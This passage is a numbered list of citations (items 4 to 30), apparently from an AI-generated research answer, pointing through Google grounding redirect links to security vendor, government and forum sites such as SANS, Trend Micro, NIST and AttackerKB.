4. [intrinsec.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQECTyxKnHL7hKRWEd8sarDG_drZ04UXEgOOJYJ-zNqqV9JbS4-WM4p_O5EtJseFFuRKQw11z5M5eLNjgtPKLeWPdqSXcMdiSpKz_JYoICsQSChjiNKDguILPxZL3uvd_RY1kqV8FfsrAGVZcCz8I7W26rEdkd2Ns_jblHjJStFnqiLo0Pkk0dAnAaWHfvuJSt8GF6w=)
5. [sans.edu](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQF84S85gOicnJrDwDneZsXVl8RgVR2nFoq2sVaCaqN8DSg6BkcD-jcaLoMcTYdhAJU_lNkmjf9OQO46hfQK36fDLQAlkAs2MstDZwqFzkVqEqoIa1UAXQ==)
6. [cisecurity.org](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGEXID_0DgAshuj69O6zCQarArSWqrVYagje_q_6GwpbTtmW74MIndQIbx82pp4hJ178_UdmVbgGH5MxXwsdq3JAXC0Xy0eDUYQp9c0ieK9Pa6gbo5WMthrBd0qJiiTFkwXb1E23rPPU4tCKeimoSDPYmCgFsVCh4VZnr0VZEeFYckIzDFuHPk=)
7. [cujo.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQELuuuZK0I6zO7Ok2ZliSXWY9ci7LefOt2ebnmnjhYzYFjUJ09eLUXAhHaMkQYri4cUG6enxyHn9sAOiHX5g9cFIMHGkNAjA3V-9CBjxx18KxrNVewmL2dh37cFnvcXPqmebgNIf21E2LkoCCGpaUksD_0w9mwYDmRGwBo-q7XrNu5zfPPZmTU_)
8. [securityaffairs.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGzI9KNK5j-80VwM161aPWrqacjqhrrOqpeMp7KfZtscFEi4GIOLo_1bB9IbkizryE01yuCXvvOl8DjSMXd6SXQ91z7ktyWeQx0dwSKtGedQZ9bM8euaSqMO34kcDWOTNBA1ISLMsTySFZtlVQwgpzjLZmUraicScVvPb4zEuh9SbsPCqM=)
9. [securityweek.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGVQ-DIBQJ77bgVfY5N8m5cGAVwBuTe0cs8nrdzsOhLESWaoT_PLZY5SSud-6T-Ba-orE2GxIIRsW2rn-qUxRoq2BT61az5Apa3jt6ugKMDaqljX-UdGGNnKjs287t_KzZIx7bcFcqYZOuKNdDS0XQi0VpF4eZ73YEACNotXA==)
10. [trendmicro.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFZBDKD13kPvBrGViybd6k5IJuqe7G4ebelIBGawDK35ooDx5fSRO_NyU_Okjr_scbPgQuRdgjd2Y6K1WVR2j16CR90vIDOJn6XMlVIeRmvT1NRSjtd_xm3Gl1w5oFW7lumrW4pYwPn-GhtNC1Q3HMXQNjwY-JJ2mK31dMDsp1J4ntaeXes97HTlIYwe_oxMakZ_9v6BeA3rRXRMG0QlTV5r4aG)
11. [trendmicro.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQE0YCVwURGtWWtPaozZJZMuBQdkSEz-65iM_yBcRDvBYFci7Zc_OrLoliOIxTZfs3uHOY7mrLR4CaaSh7KDjr-VZ-uoObEfTxiL5UcI6Eld_waX8jYmOQi8xXL94FrsrJN-jVdf7dT4t4WBSpQrjZT-_BTZ_FwSe2Akh2AEWM0rxoo_bsWXKbQMlbKL)
12. [paloaltonetworks.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGUa9WjemrG-_n6R8VCtHewbPsk16JyuEznOfJ3IRNTBhAX0k0NgFdbc2LyHdFYGSonWDv1a1IIVX0whaNDprUvJjhZo3X8iIDT4e9sJ249FzAR5QYfEvXPHdP--E_vAgtDif9X8wnj7L3O9T-TV0TURFPS5iPVpKOTXmGI7BB2ruRHJkHCQm3VjE4fPa_G7l_eSQ==)
13. [eventussecurity.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQG5TTnCno5aQBSKOue-PQKMRtCDfj2VGSpHcvxpC6Q7ElDeZxXzxxUhO7M5_vlJ1aYSXRtfk_VgjcProPh77-ytS-GkTXjUxwSKlCumTqiqseLW-13_lPGTrph9Iqpi6UtYBcjxkHlHMIKdVVbI9UiRiPplK8bWuAbZJ1zLjWxRn9R05dlm4pkfNnVYI2o9TX7lXpMq82mKZf0FyOZTRgnmS15utVO7MEy8SHY=)
14. [fortinet.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQF05jm2UDgxN9mWHCGg5MCwTPZVWzcqKuQPgQmi_B49rz5LXgCtUUU_lAJi0-bVRjY1EZ_fCaZan8_SUyJJTyiiup1YMXDx4_zNrP0WIFerGPY1GZWVEnm396lAZhQCrVyQEZY0bykSg85NQQwXR1khD8QfxbrAQnii9DZTAFV2feu0uxXqJDiIX01SG-iGQr10tNE_DKhjKD_fZ-Qr)
15. [infosecurity-magazine.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHLxDRPqTqypH9sDgwMF25XDyCCjjYdpdRg8kgQi9yVoaa7WdWmyPWWrtV8Z_X9A_498QrCi98NI9OU4Y_Whr-9IiWb7Pgp5Vf9rQKVr_MopiEaQHq8YqBLoAxLBpc-22py1Bpx5gzxAvGwoaMbioHoz4HE8Yz2GsMFELos1UgpOik=)
16. [sentinelone.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHov_tPIadwpvp66xKdp8Mwwyv4LNdIVmatehti00X0qV_MdSAnhZGjop0AvY3TsMfzkfYZU7TPPirOi55Iy8FmNQTFbydaoNbmxp0DpwhvCB4e0ztHOTr9o2WKgv87o6KRs9G4lVDM15TOWjTaTl26nobRu36mdh8=)
17. [forescout.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHxMEMN7Z7Rx4TxFvV0ItK5qMtRAB0pwbutq_lOTbfMpEDhcPFZDaClvcOXH8ihJbKWURhm7zQ78-hNowKeE0c69Uaq8o12xLuzdxPCrmXpgf3WlsCQbmV6-4G3KPVEKxL5_Ntivwon6M7eVEdkAEpoPytgU4Q=)
18. [sentinelone.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQF96iKV0p-ZiNEHUa89PYiBCPTCrB--_b_zIysVF1UlMPIlLqRjvhfbYqSXyfOH9-913chOiGlqGN35mINO1uA296n9i3smiAnblUzBwPQsOJo7Chryr9SXZkgOpXLgnze9R_j_OwCSsh-7Zc2OQ-1L8cp3EpzWR10=)
19. [democert.org](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFJ6Mb4FdvtsJXyyu-iP3O3bMpOZ-zCnNk3dY50CV5WWExhGqBF0taPY-9jPI3Vl3pYrvRCGnhi9_sV4UzHySszLd47-nwWYykRCujOgbhJtPMSDqBRueyvS7cu3lhYoxYB0mVX)
20. [fiery.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEshxKmKV8ZBSHALXpRW5TmGbzWw1v4sqoE2x4EtUqdjrjA5vFOp8hhs4DAB0u-Q-I_SRAiAvxLk46DoIv3H9ugaCobRt3m1Yk7iBdj5WLNwf7Y8hLzv-QFrr9okj1nK3ANvLr6ftya7K0ilkNnuIh4IBqYzQ==)
21. [cisco.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEJ6tUM0FjWQEX8TYtUML-ZSFyu3Xzc4OET_2pVKpKTiiRYiJbeQDV2Hywe2bZDB-Ni8um0W-z9Mb_Bk_pWyXKatz6UKFRri4xDWuN5gqb4xFyJLOoV39UXcvgRdLGYo5yQ6sUpBo0k42kWlzuKqcQsPl31tAn2L1BaolAAYQvh2hhRPnSS_X-Hgq8=)
22. [emergingthreats.net](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGvhtNUDWX2S3e5HvfB0Y-DOVs1PoBwsDs1aGongmrr8ve8WbYOLNExjISVYb2ECzHtTXf_lQc_KLcBGKeKR0AHXclcJDtNDJyhkFgrmqrt1lDSJ-HP50O9thTYQLf3cmCT4tdCok-zPSuaa6uxzs8AMDsXRqB08Ueh5Oeopbp7Mbr2VspqHdxxPnzX)
23. [stackexchange.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGtWD9YiTE4bHVVKMAg_dcbtOr209fhymPZRIdiMdqo92VrdbVlWjmMzDCvUXoCRshmJO3YhIudz55yalVOOPxgPquC3vUsJsZzbNZQ7JhcJDHgyNamDOiO0E7ByAokPlBxDzaVq0xqKaZpPDt_twaVv3vRfoSKPXvFLJ3T2XdFSvnNUnGk6pYZ69KfWD35kCGKynrubFFSNWR_HbL7O-toVrDLP40k)
24. [rapid7.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGC0xUrP0IUglPRBwLJnia5RRq_YqQXMClgXhuVonyCS5wQkDovu1AlrgR86Ik5AJpbzQkdMye0p4J4iDUo2xWTQktjV-K1v7VWQoiD_ZqSY1CDGUPKNl1Cq-xpr2D0WWGLRj6GjmwX_R2eg_TaBIy4DiaeMUm8h3hQpzo=)
25. [nist.gov](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHGXsuT9XuhUggA7YpqelqIUidUc0xux56fnArDelthp6U1VGArCPUkyBkrMU7NkFkSYfKrdVGqAGLbR04hKnOq7b2Vgcz7xsftUhx-LlFxYrvF7HvPgtfYfIMXgb5rI9LOUzkt0Q==)
26. [armis.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGi8B6S6jduT4O0IaR1vNwfJ4hEf4dG8SMdyIQDxFqNYeFbicZIJLEkK3zaOOXHESmWemEZzlgYN-hczWtronjqvTD3OzxDgyfzNmRNutmM_PgU4dMKzb26ryEB8CxJmQ==)
27. [infosecinstitute.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHcOEgDbqjJpvylb4_Tq4r1z93EG2UB4ceAtJ15mOXHdYx--_cxSn3ZSp_seuJ1A2asl5MHj4GP2CZ_DNRybE1T-czKAnYBXNG2rt3fhOEwCNQEdSZvXDmTImte6AQu3COLQ0Ddr-zR031kBufDO2UqLxzrB_1MA6uLBd_K1jVfNhOY4xqIKG6dWg==)
28. [grc.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGbx2DC-YcUsRbHQEpIY0tsAVxXjxJTtx_k_vrkNUEgy1yfTXU53kv-YlPIUuo-5FPUx52cGxtPjaHqBegP-fi1Q_uy1zVU58cuGtA4NwtuOAPNhV1KGPShlTEhaTs=)
29. [attackerkb.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHAQW7_LyMuPlH8x5QPxR89H8vez8mGwnbTGnGFGAvFNeWGOfFf97G-d4lEf7OK82kvL0rVhxgzqowci_G7-x0xXZAIb9MzPaKJxEhrf16F6RlR1mIK4m199AgMlACp6t5LyKZEra_d6myE7iQ4liS46LrSpLegw5rD6L4wfRvwzp7Rch-pbThs04k=)
30. [github.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFwOacwn371BQyTLxP9rXs3hW2fcGDvlt8LBi2tBfhRw0ei2yNFtMxGp-0wERAiITlQzw2N1rl7W76Ie5j16fGhqEc7hcfJBwa7tFYe0TiQrLYiPzIsfjZLGbx374hGCOAlqqlaymwqihd8qs3Diqa8y6sxWHy5e5qV5kVIz6VbM-ceVQ==)